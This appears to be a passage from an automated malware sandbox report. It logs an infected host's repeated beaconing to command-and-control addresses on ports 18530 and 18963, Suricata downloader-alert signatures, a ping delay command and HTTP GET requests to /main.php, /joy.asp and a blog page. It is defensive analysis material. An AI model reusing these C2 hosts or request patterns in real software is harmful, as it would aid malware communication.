Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 18963
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 107.163.56.235:18530
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 107.163.56.110:18530
Source: global trafficTCP traffic: 192.168.2.7:49808 -> 107.163.56.251:6658
Source: global trafficTCP traffic: 192.168.2.7:49816 -> 107.163.56.236:18963
Source: Joe Sandbox ViewIP Address: 107.163.56.110 107.163.56.110
Source: Joe Sandbox ViewIP Address: 107.163.56.251 107.163.56.251
Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49707 -> 107.163.56.110:18530
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49706 -> 107.163.56.235:18530
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49834 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49831 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49835 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49816 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49850 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49848 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49849 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49874 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49876 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49890 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49861 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49905 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49903 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49836 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49917 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49931 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49860 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49916 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49970 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49955 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49968 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49933 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49971 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49995 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49957 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50008 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49948 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50022 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49817 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50021 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49891 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50009 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50023 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50035 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49996 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49958 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50050 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50049 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50063 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49941 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50076 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50074 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50082 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50088 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50089 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49982 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50097 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50092 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50075 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50106 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50111 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50095 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50047 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50090 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50107 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49994 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50112 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50036 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50109 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50114 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50113 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50123 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50132 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50100 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50087 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50129 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50081 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50127 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50099 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50128 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50034 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50083 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50117 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50091 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50122 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50131 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49889 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50061 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49869 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49918 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49904 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49981 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49932 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50093 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50098 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49942 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50062 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50094 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50007 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50118 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50124 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50115 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49875 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50101 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50105 -> 107.163.56.236:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49983 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50119 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50102 -> 107.163.56.236:18963
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET //joy.asp?sid=rungnejcodjgn0uWFe5vteX8v2LUicbtudb8mteZmdeYndG@ HTTP/1.1User-Agent: Mozilla/4.0 (compatible)Host: 107.163.56.235:18530Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u1129.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.110:18530Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
